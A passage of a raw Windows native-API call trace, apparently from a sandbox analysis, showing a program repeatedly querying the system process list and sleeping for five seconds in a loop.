ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.354] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.375] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 